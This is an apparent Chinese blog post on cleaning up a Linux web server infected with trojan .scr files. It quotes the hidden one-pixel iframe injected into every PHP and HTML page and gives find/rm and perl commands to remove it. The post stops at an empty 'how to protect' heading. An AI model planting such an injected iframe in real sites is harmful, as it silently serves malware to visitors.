突然发现Linux服务器上应用无法访问,报500错误,登录查看后发现磁盘被刷满了。
1、被挂马后服务器的情况
- 每个目录都是Photo.scr、Video.scr等文件;
- 每个程序文件中(.php,.html)文件都被加入恶意代码
<iframe src=Photo.scr width=1 height=1 frameborder=0>
2、找了资料发现大家的解决方案分两步(如果是Windows系统自行百度):
- 删除木马文件,在网站代码目录执行删除命令(自行修改目录和文件名称):
sudo find /data/web/ -type f -name "Video.scr" -print -exec rm -rf {} \; - 删除每个程序文件中的恶意代码(根据自己应用的类型修改后缀名):
`find /data/web/ -name '*.php' | xargs perl -pi -e 's|<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>||g'`
`find /data/web/ -name '*.html' | xargs perl -pi -e 's|<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>||g'`
3、怎么防护?
